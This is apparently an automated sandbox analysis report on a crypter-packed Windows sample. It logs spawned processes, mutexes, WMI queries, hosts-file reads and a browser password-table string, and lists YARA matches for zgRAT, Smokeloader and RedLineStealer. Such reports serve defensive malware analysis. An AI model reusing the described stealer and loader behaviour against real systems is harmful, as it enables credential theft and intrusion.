                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040829915_2_00408299
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004072B215_2_004072B2
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B34715_2_0041B347
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041935415_2_00419354
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040A37415_2_0040A374
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040931615_2_00409316
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040632015_2_00406320
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040632115_2_00406321
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004063C415_2_004063C4
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004093D815_2_004093D8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040838B15_2_0040838B
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004063AB15_2_004063AB
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004063B815_2_004063B8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040940A15_2_0040940A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B41F15_2_0041B41F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040942F15_2_0040942F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040856815_2_00408568
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004095DE15_2_004095DE
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004215E515_2_004215E5
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040964715_2_00409647
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A66B15_2_0041A66B
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A60F15_2_0041A60F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040562715_2_00405627
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040863215_2_00408632
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041B6D815_2_0041B6D8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004096DC15_2_004096DC
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004096E115_2_004096E1
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041669615_2_00416696
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004086A715_2_004086A7
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040976E15_2_0040976E
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040977615_2_00409776
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040870C15_2_0040870C
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004087C115_2_004087C1
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040D7CD15_2_0040D7CD
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040D7E715_2_0040D7E7
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040D7F215_2_0040D7F2
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040D7FB15_2_0040D7FB
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040984515_2_00409845
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A85415_2_0041A854
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040986A15_2_0040986A
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041781F15_2_0041781F
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004098C515_2_004098C5
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004098FB15_2_004098FB
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A89715_2_0041A897
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040794515_2_00407945
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041690115_2_00416901
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041691815_2_00416918
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041A93C15_2_0041A93C
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_004099AA15_2_004099AA
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407A6615_2_00407A66
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416A0315_2_00416A03
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409A0415_2_00409A04
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416A1915_2_00416A19
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409A3215_2_00409A32
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409A3B15_2_00409A3B
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409ADE15_2_00409ADE
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407A8115_2_00407A81
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416B6415_2_00416B64
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407B2415_2_00407B24
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407B3315_2_00407B33
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409BC315_2_00409BC3
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407BC815_2_00407BC8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409BE815_2_00409BE8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409B9115_2_00409B91
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407B9515_2_00407B95
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00407BB515_2_00407BB5
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040BBB615_2_0040BBB6
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00417C0115_2_00417C01
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040BC8015_2_0040BC80
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00418CB115_2_00418CB1
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0041AD8D15_2_0041AD8D
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409E7E15_2_00409E7E
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416E1815_2_00416E18
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00406EFD15_2_00406EFD
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_0040DE8615_2_0040DE86
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409EA315_2_00409EA3
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416F6415_2_00416F64
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416F7515_2_00416F75
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416F0D15_2_00416F0D
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00409F1515_2_00409F15
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416FCA15_2_00416FCA
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416FDB15_2_00416FDB
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416FEA15_2_00416FEA
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00405FF115_2_00405FF1
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416F8615_2_00416F86
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416F9715_2_00416F97
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00416FA815_2_00416FA8
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: 15_2_00405FB515_2_00405FB5
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Security
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: String function: 00502A87 appears 39 times
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: String function: 004FEDB6 appears 70 times
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: String function: 005029F6 appears 99 times
                              Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exeCode function: String function: 00502A53 appears 375 times
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0053F880 appears 39 times
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004172E0 appears 53 times
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000000.1340413535.00000000004B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemazda.exe0 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1345777835.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePDFReader.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePE.dll& vs SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.4e10000.3.raw.unpack, Ca01BQGh9DxiBOJwup.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@93/120@15/20
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,8_2_00409448
                              Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exeCode function: 12_2_026D04FA CreateToolhelp32Snapshot,Module32First,12_2_026D04FA
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00433600 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize,2_2_00433600
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: 8_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,8_2_00409C34
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe.logJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_15
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeMutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7888
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeFile created: C:\Users\user\AppData\Local\Temp\is-3I532.tmpJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeFile opened: C:\Windows\system32\d8235ff2bb755597b25d1e3a31c849fdea11f313e641bb18fed09c49fcebd4b5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Program Files (x86)\desktop.ini
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1930485208.00000000031EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeReversingLabs: Detection: 71%
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeVirustotal: Detection: 42%
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: /addr_imp
                              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
